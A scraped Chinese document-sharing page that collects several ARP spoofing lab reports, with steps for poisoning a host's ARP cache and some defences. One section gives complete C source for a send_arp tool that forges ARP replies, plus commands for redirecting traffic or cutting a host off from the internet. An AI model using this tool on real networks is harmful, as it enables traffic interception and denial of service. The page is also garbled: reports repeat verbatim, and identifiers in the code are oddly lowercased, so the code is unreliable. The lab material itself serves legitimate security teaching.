实验二 ARP欺骗实验

合集下载

arp欺骗 实验报告

arp欺骗 实验报告

arp欺骗实验报告
ARP欺骗实验报告
在网络安全领域,ARP欺骗是一种常见的攻击手段,它利用ARP协议的漏洞来
欺骗网络设备,使其发送数据包到错误的目的地。

为了更好地了解ARP欺骗的
原理和影响,我们进行了一项实验。

实验步骤如下:
1. 准备工作:我们使用了一台路由器和两台电脑来搭建局域网环境。

其中一台
电脑作为攻击者,另一台电脑作为受害者。

2. ARP欺骗攻击:在攻击者电脑上,我们使用工具来发送伪造的ARP响应包,
将受害者电脑的IP地址映射到攻击者的MAC地址上。

3. 数据传输测试:在进行ARP欺骗攻击后,我们在受害者电脑上发送了一些数
据包,观察其传输情况。

实验结果如下:
1. 数据包丢失:在进行ARP欺骗攻击后,我们发现受害者电脑发送的数据包并
没有到达预期的目的地,而是被发送到了攻击者电脑上。

2. 网络混乱:由于ARP欺骗导致了数据包发送错误,整个局域网环境出现了混乱,部分数据包甚至丢失。

结论:
通过这次实验,我们深刻认识到ARP欺骗对网络的危害。

攻击者可以利用ARP
欺骗来窃取数据、监控通信内容甚至篡改数据,给网络安全带来了严重的威胁。

因此,我们呼吁网络管理员和用户加强对ARP欺骗攻击的防范意识,采取相应
的安全措施来保护网络安全。

同时,我们也希望厂商能够加强对ARP协议的安
全性设计,减少网络攻击的可能性。

arp欺骗实验报告

arp欺骗实验报告

arp欺骗实验报告
ARP欺骗实验报告
在网络安全领域,ARP欺骗是一种常见的攻击手段,用于窃取网络通信数据或
者对网络进行破坏。

为了更好地了解ARP欺骗的原理和危害,我们进行了一系
列的ARP欺骗实验。

实验一:ARP欺骗原理
首先,我们对ARP协议进行了深入的研究,了解了ARP欺骗的原理。

ARP协议是用于将IP地址映射到MAC地址的协议,而ARP欺骗则是指攻击者发送虚假
的ARP响应,欺骗目标主机将其通信数据发送到攻击者的机器上,从而实现窃
取数据或者中间人攻击的目的。

实验二:ARP欺骗的危害
在实验中,我们模拟了一次ARP欺骗攻击,并观察了其对网络的影响。

我们发现,一旦发生ARP欺骗,目标主机会将其通信数据发送到攻击者的机器上,导
致数据泄露和网络通信的混乱。

此外,ARP欺骗还可能导致网络中断或者恶意
软件的传播,给网络安全带来严重的威胁。

实验三:防范ARP欺骗的方法
为了防范ARP欺骗攻击,我们测试了一些常见的防御方法,包括静态ARP绑定、ARP监控和网络流量分析等。

我们发现,这些方法可以有效地防止ARP欺骗攻击,保护网络通信的安全和稳定。

总结:ARP欺骗是一种常见的网络攻击手段,具有严重的危害。

通过本次实验,我们更加深入地了解了ARP欺骗的原理和危害,以及防范ARP欺骗的方法,为网络安全的保护提供了重要的参考和指导。

希望我们的实验报告能够对网络安
全研究和实践提供有益的启示。

网络安全实验报告 - ARP欺骗

网络安全实验报告 - ARP欺骗

首先使用“快照X”恢复Windows/Linux系统环境。

一.ARP欺骗攻击实验需求:(1)本实验使用交换网络结构(参见附录B),组一、二和三间通过交换模块连接(主机A、C、E通过交换模块连接,主机B、D、F也通过交换模块连接)。

因此,正常情况下,主机C无法以嗅探方式监听到主机A与主机E间通信数据,同样主机D也无法监听到主机B与主机F间的通信数据。

(2)主机C要监听主机A和主机E间的通信数据;主机D要监听主机B与主机F间的通信数据。

分析:黑客主机通过对目标主机进行ARP欺骗攻击,获取目标主机间的通信数据。

1.正常通信(1)目标主机二单击工具栏“UDP工具”按钮,启动UDP连接工具,创建2513/udp服务端。

(2)目标主机一启动UDP连接工具,将“目标机器”IP地址指定为目标主机二的地址,目标端口与服务器一致。

在“数据”文本框中输入任意内容,单击“发送”按钮,向服务端发送数据。

服务端确定接收到数据。

(3)黑客主机单击工具栏“控制台”按钮,切换至/opt/ExpNIS/NetAD-Lab/Tools/ids/目录(Snort目录),执行如下命令:通过上述命令snort仅会监听源IP地址为目标主机一的、传输协议类型为UDP的网络数据(4)目标主机一再次向目标主机二发送消息,黑客主机停止snort监听(Ctrl+C),观察snort监听结果,是否监听到目标主机间的通信数据。

为什么?没有监听到结果,目标主机不在同一个共享设备上,正常状态下目标主机一和二间的通信,黑客主机监听不到它们之间的信息。

(5)目标主机一查看ARP缓存表,确定与目标主机二的IP相映射的MAC 地址是否正常。

不正常,缓存表多出一行新的内容。

2.ARP攻击(1)黑客主机单击平台工具栏“控制台”按钮,进入实验目录,运行ARPattack 程序攻击目标主机一,将其ARP缓存表中与目标主机二相映射的MAC地址更改为黑客主机的MAC地址。

其中第一个参数为被攻击主机IP地址,第二个参数为被攻击主机MAC地址,第三个参数为与被攻击主机进行正常通信的主机IP地址。

网络安全实验报告 - ARP欺骗

网络安全实验报告 - ARP欺骗

首先使用“快照X”恢复Windows/Linux系统环境。

一.ARP欺骗攻击实验需求:(1)本实验使用交换网络结构(参见附录B),组一、二和三间通过交换模块连接(主机A、C、E通过交换模块连接,主机B、D、F也通过交换模块连接)。

因此,正常情况下,主机C无法以嗅探方式监听到主机A与主机E间通信数据,同样主机D也无法监听到主机B与主机F间的通信数据。

(2)主机C要监听主机A和主机E间的通信数据;主机D要监听主机B与主机F间的通信数据。

分析:黑客主机通过对目标主机进行ARP欺骗攻击,获取目标主机间的通信数据。

1.正常通信(1)目标主机二单击工具栏“UDP工具”按钮,启动UDP连接工具,创建2513/udp服务端。

(2)目标主机一启动UDP连接工具,将“目标机器”IP地址指定为目标主机二的地址,目标端口与服务器一致。

在“数据”文本框中输入任意内容,单击“发送”按钮,向服务端发送数据。

服务端确定接收到数据。

(3)黑客主机单击工具栏“控制台”按钮,切换至/opt/ExpNIS/NetAD-Lab/Tools/ids/目录(Snort目录),执行如下命令:通过上述命令snort仅会监听源IP地址为目标主机一的、传输协议类型为UDP的网络数据(4)目标主机一再次向目标主机二发送消息,黑客主机停止snort监听(Ctrl+C),观察snort监听结果,是否监听到目标主机间的通信数据。

为什么?没有监听到结果,目标主机不在同一个共享设备上,正常状态下目标主机一和二间的通信,黑客主机监听不到它们之间的信息。

(5)目标主机一查看ARP缓存表,确定与目标主机二的IP相映射的MAC 地址是否正常。

不正常,缓存表多出一行新的内容。

2.ARP攻击(1)黑客主机单击平台工具栏“控制台”按钮,进入实验目录,运行ARPattack 程序攻击目标主机一,将其ARP缓存表中与目标主机二相映射的MAC地址更改为黑客主机的MAC地址。

其中第一个参数为被攻击主机IP地址,第二个参数为被攻击主机MAC地址,第三个参数为与被攻击主机进行正常通信的主机IP地址。

arp欺骗 实验报告

arp欺骗 实验报告

arp欺骗实验报告ARP欺骗实验报告引言ARP(地址解析协议)是用于将IP地址映射到MAC地址的协议,它在局域网中起着至关重要的作用。

然而,由于其工作机制的特性,ARP协议也容易受到欺骗攻击的影响。

本实验旨在通过模拟ARP欺骗攻击,探究其对网络安全的影响。

实验设计本次实验使用了一台路由器和两台计算机,它们分别连接在同一个局域网中。

其中一台计算机作为攻击者,另一台计算机作为受害者。

攻击者使用工具对受害者进行ARP欺骗攻击,将受害者的IP地址映射到自己的MAC地址上,从而实现对受害者的网络流量窃取或篡改。

实验过程在实验开始之前,我们首先使用Wireshark网络抓包工具监控局域网中的数据流量。

然后攻击者使用工具发送伪造的ARP响应包,将受害者的IP地址映射到自己的MAC地址上。

接着,我们再次通过Wireshark监控数据流量,观察受害者的网络通信是否受到影响。

实验结果通过实验我们发现,一旦受害者的ARP缓存表被攻击者篡改,受害者将无法正常与其他设备进行通信。

攻击者可以窃取受害者的数据流量,或者将受害者的流量重定向到自己的设备上进行篡改。

这对于网络安全来说是一个严重的威胁,可能导致机密信息泄露或者网络服务受到破坏。

结论ARP欺骗攻击是一种常见的网络安全威胁,它可以对局域网中的设备造成严重影响。

为了防范这种攻击,网络管理员需要采取一系列措施,包括加强网络设备的安全设置、定期清理ARP缓存表、使用加密通信协议等。

同时,网络设备厂商也应该加强对ARP协议的安全性设计,以提高网络的整体安全性。

通过本次实验,我们对ARP欺骗攻击有了更深入的了解,也更加意识到了网络安全的重要性。

5.6.1 实例——arp欺骗

5.6.1  实例——arp欺骗

5.6.1 实例——arp欺骗1.实验环境实验环境如图5.35所示。

图5.35 实验环境2.arp欺骗过程第1步:被欺骗者可以ping通欺骗者。

被欺骗者(192.168.85.1)执行ping 192.168.85.129 -n 1命令,可以ping通。

然后执行arp -a命令查看arp缓存,得知欺骗者(192.168.85.129)MAC 地址为00-0c-29-d5-91-01,如图5.36所示。

图5.36 被欺骗者可以ping通欺骗者第2步:进行arp欺骗。

如图5.37所示,欺骗者(192.168.85.129)先执行ifconfig eth0命令,查看本网卡的MAC地址,然后执行./send_arp.o 192.168.85.129 00:0c:29:d5:91:11 192.168.85.1 00:50:56:c0:00:08 1命令,对192.168.85.1进行arp欺骗。

其中,send_arp.o语法为:send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number第3步:被欺骗者不可以ping通欺骗者。

如图5.38所示,先执行ping 192.168.85.129 -n 1命令,不可以ping通,再执行arp -a命令查看arp缓存,可知192.168.85.129的MAC地址已变。

如果本网络的网关是192.168.85.254,那么想让192.168.85.100不能访问互联网,就可以执行命令./send_arp.o 192.168.85.254“假MAC”192.168.85.100“100的MAC”1命令,对192.168.85.100进行arp欺骗。

可以每分钟执行一次该命令,192.168.85.100得不到正确的到网关的arp映射表项,就访问不了互联网了。

图5.37 进行arp欺骗图5.38 被欺骗者不可以ping通欺骗者3.源程序头文件“send_arp.h”:#include <stdlib.h>#include <stdio.h>#include <sys/socket.h>#include <sys/types.h>#include <sys/ioctl.h>#include <errno.h>#include <netdb.h>#include <net/if.h>#include <netinet/ip.h>#include <netinet/in.h>#include <netinet/ip_icmp.h>#include <string.h>#include <signal.h>#include <arpa/inet.h>#include <linux/if_ether.h>#define ETH_HW_ADDR_LEN 6#define IP_ADDR_LEN 4#define arp_FRAME_TYPE 0x0806#define ETHER_HW_TYPE 1#define IP_PROTO_TYPE 0x0800#define OP_arp_REQUEST 2#define OP_arp_QUEST 1#define DEFAULT_DEVICE "eth0"char usage[] = {"send_arp: sends out custom arp packet. \n""usage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr number"};struct arp_packet{u_char targ_hw_addr[ETH_HW_ADDR_LEN];u_char src_hw_addr[ETH_HW_ADDR_LEN];u_short frame_type;u_short hw_type;u_short prot_type;u_char hw_addr_size;u_char prot_addr_size;u_short op;u_char sndr_hw_addr[ETH_HW_ADDR_LEN];u_char sndr_ip_addr[IP_ADDR_LEN];u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];u_char rcpt_ip_addr[IP_ADDR_LEN];u_char padding[18];};void die (char *);void get_ip_addr (struct in_addr *, char *);void get_hw_addr (char *, char *);源文件“send_arp.c”:#include "send_arp.h"void die (char *str){fprintf(stderr, "%s\n", str);exit(1);}void get_ip_addr (struct in_addr *in_addr, char *str){struct hostent *hostp;in_addr->s_addr = inet_addr(str);if(in_addr->s_addr == -1){if ((hostp = gethostbyname(str)))bcopy(hostp->h_addr, in_addr, hostp->h_length); else {fprintf(stderr, "send_arp: unknown host %s\n", str); exit(1);}}}void get_hw_addr (char *buf, char *str){int i;char c, val;for(i = 0; i < ETH_HW_ADDR_LEN; i++){if (!(c = tolower(*str++)))die("Invalid hardware address");if (isdigit(c))val = c - '0';else if (c >= 'a' && c <= 'f')val = c-'a'+10;elsedie("Invalid hardware address");*buf = val << 4;if (!(c = tolower(*str++)))die("Invalid hardware address");if (isdigit(c))val = c - '0';else if (c >= 'a' && c <= 'f')val = c-'a'+10;elsedie("Invalid hardware address");*buf++ |= val;if (*str == ':')str++;}}int main (int argc, char * argv[]){struct in_addr src_in_addr, targ_in_addr;struct arp_packet pkt;struct sockaddr sa;int sock;int j, number;if (argc != 6)die(usage);sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_Rarp)); if (sock < 0){perror("socket");exit(1);}number=atoi(argv[5]);pkt.frame_type = htons(arp_FRAME_TYPE);pkt.hw_type = htons(ETHER_HW_TYPE);pkt.prot_type = htons(IP_PROTO_TYPE);pkt.hw_addr_size = ETH_HW_ADDR_LEN;pkt.prot_addr_size = IP_ADDR_LEN;pkt.op = htons(OP_arp_QUEST);get_hw_addr(pkt.targ_hw_addr, argv[4]);get_hw_addr(pkt.rcpt_hw_addr, argv[4]);get_hw_addr(pkt.src_hw_addr, argv[2]);get_hw_addr(pkt.sndr_hw_addr, argv[2]);get_ip_addr(&src_in_addr, argv[1]);get_ip_addr(&targ_in_addr, argv[3]);memcpy(pkt.sndr_ip_addr, &src_in_addr, IP_ADDR_LEN); memcpy(pkt.rcpt_ip_addr, &targ_in_addr, IP_ADDR_LEN); bzero(pkt.padding, 18);strcpy(sa.sa_data, DEFAULT_DEVICE);for (j=0;j<number;j++){if (sendto(sock, &pkt, sizeof(pkt), 0, &sa, sizeof(sa)) < 0){perror("sendto");exit(1);}}exit(0);}。

实现ARP欺骗实验报告

实现ARP欺骗实验报告

实现ARP欺骗实验报告实验目的:掌握ARP欺骗的原理和技术,并通过实验加深对ARP欺骗攻击的理解。

实验原理:地址解析协议(ARP)是一种用于在局域网中将IP地址映射到物理地址的协议。

ARP欺骗是一种利用ARP协议的漏洞进行的攻击,攻击者通过伪造ARP响应包,将目标IP地址与攻击者的MAC地址进行绑定,从而达到窃取数据、中间人攻击等目的。

ARP欺骗的基本原理是攻击者发送伪造的ARP响应包给局域网中的其他设备,要求将目标IP地址的MAC地址更新为攻击者的MAC地址,从而使得目标设备将数据发送给攻击者,从而实现数据窃取和中间人攻击。

实验材料:1.两台计算机;2.一台路由器;3. ARP欺骗工具(如Cain & Abel)。

实验步骤:1.将两台计算机和一台路由器连接到同一个局域网中。

2.在计算机A上运行ARP欺骗工具,设置攻击者的IP地址、目标IP地址和攻击者的MAC地址。

3. 在计算机B上运行网络监控工具,例如Wireshark,以便监控网络流量和检测ARP欺骗攻击。

4.在计算机A上发送ARP欺骗攻击,向局域网中的所有设备发送伪造的ARP响应包,将目标IP地址的MAC地址更新为攻击者的MAC地址。

5.监控计算机B上的网络流量,观察是否发现异常情况,例如数据包被攻击者拦截、中间人攻击等。

6.完成实验后,及时恢复网络环境,确保网络安全。

实验结果:通过实验,我们成功实现了ARP欺骗攻击。

攻击者发送的伪造ARP响应包成功地将目标IP地址的MAC地址更新为攻击者的MAC地址,并成功拦截了计算机B的网络流量。

通过网络监控工具,我们观察到了异常的网络行为,确认了ARP欺骗攻击的存在。

实验总结:ARP欺骗是一种常见的安全漏洞,攻击者通过伪造ARP响应包进行攻击,容易导致数据被窃取和中间人攻击。

为了保护网络安全,我们应该采取相应的防护措施,例如使用静态ARP表、启用交换机上的ARP验证功能、使用网络流量监控工具等。

arp欺骗实验报告

arp欺骗实验报告

arp欺骗实验报告ARP欺骗实验报告引言:ARP(Address Resolution Protocol)是计算机网络中的一种协议,用于将IP地址转换为物理地址(MAC地址)。

ARP欺骗是一种网络攻击技术,攻击者通过伪造ARP响应包来欺骗网络中的主机,使其将数据发送到攻击者控制的设备上。

本实验旨在研究ARP欺骗的原理、方法以及对网络的影响。

实验目的:1. 研究ARP欺骗的原理和工作机制。

2. 实际操作ARP欺骗攻击,并观察其对网络的影响。

3. 探讨防范ARP欺骗的方法。

实验步骤:1. 搭建实验环境:使用两台计算机,一台作为攻击者,一台作为受害者。

两台计算机连接到同一个局域网中。

2. 配置网络设置:攻击者计算机启用IP转发功能,确保可以转发受害者的数据包。

3. 获取网络信息:攻击者计算机使用ARP协议获取受害者计算机的IP地址和MAC地址。

4. 发送伪造ARP响应包:攻击者计算机发送伪造的ARP响应包,将受害者的IP 地址与攻击者的MAC地址进行映射。

5. 受害者响应:受害者计算机接收到伪造的ARP响应包后,将其缓存到ARP缓存表中。

6. 数据重定向:攻击者计算机将受害者的数据包转发到目标设备,同时将目标设备的响应数据包转发给受害者,实现数据重定向。

7. 观察网络影响:观察受害者计算机的网络连接是否受到干扰,网络速度是否下降。

实验结果与分析:在实验中,我们成功进行了ARP欺骗攻击,并观察到以下结果:1. 受害者计算机的网络连接受到干扰:受害者计算机无法正常访问互联网,网络速度明显下降。

2. 攻击者计算机能够获取受害者的数据包:攻击者计算机能够成功转发受害者的数据包,并获取目标设备的响应数据包。

3. 网络通信异常:由于攻击者计算机作为中间人拦截了受害者和目标设备之间的通信,网络通信变得异常不稳定。

ARP欺骗攻击的原理是通过伪造ARP响应包,将受害者的IP地址与攻击者的MAC地址进行映射,使得受害者将数据发送到攻击者控制的设备上。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

实验二ARP欺骗实验
【实验目的】
加深对ARP高速缓存的理解
了解ARP欺骗在网络攻击中的应用
【实验原理】
ARP欺骗是黑客常用的攻击手段之一,ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。

第一种ARP欺骗的原理是——截获网关数据。

它通过发送ARP应答包通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC无法收到信息。

第二种ARP欺骗的原理是——伪造网关。

它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。

在PC看来,就是上不了网了,“网络掉线了”。

ARP表是IP地址和MAC地址的映射关系表,任何实现了IP协议栈的设备,一般情况下都通过该表维护IP地址和MAC地址的对应关系,这是为了避免ARP 解析而造成的广播数据报文对网络造成冲击。

【实验环境】
需要使用协议编辑软件进行数据包编辑并发送;IP地址分配参考如下表所示。

设备IP地址Mac地址后缀
HostA 10.28.23.112 44-37-e6-10-77-81
HostB 10.28.23.168 28-92-4a-56-15-c2 设备连接即两台个人电脑。

【实验内容】
搭建网络实现ARP地址欺骗过程
防范ARP地址欺骗
【实验步骤】
一、设定环境(在实验中应根据具体实验环境进行实验)
(1)根据环境拓扑图设定网络环境,并测试连通性。

(2)需要使用协议编辑软件进行数据包编辑并发送。

二、主机欺骗
(1)获得设定网络中各主机的IP地址和MAC地址,Ping网关。

如图2-1、图
2-2
图2-1
图2-2
(2)在HostB IP为10.28.23.168的主机上使用arp –a命令查看网关的arp的列
表,如图3-1所示。

图3-1 ARP缓存表
通过上面命令可以看到真实网关的MAC地址为00-03-0f-02-ba-43,可以通过发送ARP应答包改变客户机的ARP列表,将网关的MAC地址改变44-37-e6-10-77-81。

从网络教学平台上下载ARP欺骗工具,设置相关信息,通过将网关的MAC 地址伪造成HostA的MAC地址,模拟网关路由器发送ARP应答包,改变主机HostB的arp列表。

(3)在HostB上使用wireshark抓包查看并分析ARP应答包的内容。

(4)在HostB上使用命令arp –a命令来查看arp表项,如图3-2所示。

图3-2 ARP缓存表
此时,所有向外发送的数据包,都会被转发到攻击者的主机上,从而获得敏感信息。

用命令arp – d 命令来清空ip,如图3-3所示,以便后续实验的进行。

图3-3
【实验思考】
1.如何防止ARP欺骗?
答:安装杀毒软件、安装ARP防火墙软件
2.如果受到了ARP欺骗如何破解这种欺骗并保持正常网络环境?
答:用命令arp – d 命令来清空ip,并加以防范。

相关文档
最新文档